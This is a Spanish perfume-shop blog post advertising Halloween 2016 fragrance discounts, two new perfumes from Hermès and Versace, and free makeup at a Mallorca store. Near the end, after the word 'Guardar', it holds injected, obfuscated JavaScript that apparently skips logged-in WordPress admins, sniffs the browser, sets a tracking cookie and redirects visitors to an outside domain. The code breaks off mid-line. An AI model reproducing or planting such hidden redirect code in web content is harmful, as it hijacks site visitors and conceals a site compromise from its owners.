perfumerias-tin-tin-2

El 31 de octubre es conocido como el día más terrorífico del año. ¿Lo tienes todo para este Halloween? Disfraz ✓, maquillaje ✓, perfume ✗. ¡No te preocupes! En Perfumerías Tin Tin celebramos este día con descuentos de miedo en toda nuestra sección de perfumería. Sabemos que llegada esta época del año te apetece cambiar de aroma, dejar de lado la frescura del verano para dejarte seducir por las sofisticadas fragancias de esta temporada. Por eso, hoy en nuestro blog podrás descubrir 2 nuevos perfumes que oleremos este otoño.

Empezamos por Galop d’Hermès, el primer perfume de la casa creado por Christine Nagel, quien afirma que esta fragancia ha sido concebida con dos ingredientes emblemáticos de Hermès y de la perfumería: el cuero y la rosa, es una fragancia irresistible en la que la rosa le da un toque atemporal  y el cuero le da la fuerza. Es perfecto para las mujeres modernas y de espíritu libre.

En cuanto a fragancias masculinas para este otoño, Versace presenta Dylan Blue, una fragancia sensual y fuerte con notas envolventes de almizcle mineral, haba tonka, y el azafrán que se prestan a una pasión incisiva. Donatella Versace describe la fragancia como el aroma del hombre de hoy, llena de carácter e individualidad.

¿Te han gustado estas novedades? Entra en www.perfumestintin.com y aprovecha hasta un 40% de descuento en perfumes de las mejores marcas del 26 de octubre hasta el 1 de noviembre 2016.

Estas son otras fragancias que te pueden interesar con un descuento de miedo:

perfume halloweenperfume hugo boss boss bottled Perfume jean paul gaultier classiqueperfume diesel bad

Y si nos lees desde Mallorca y quieres verte terroríficamente guapa este Halloween, te invitamos a pasar por nuestra nueva tienda ubicada en el Centro Comercial Fan Mallorca Shopping el lunes 31 de octubre y nuestras maquilladoras profesionales te maquillarán gratis y te enseñarán todo sobre tendencias en color para esta temporada con ahumados irresistibles, labios oscuros… Pide tu cita ya llamando al 871 03 10 60.

 halloween maquillaje mallorca

Guardar var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone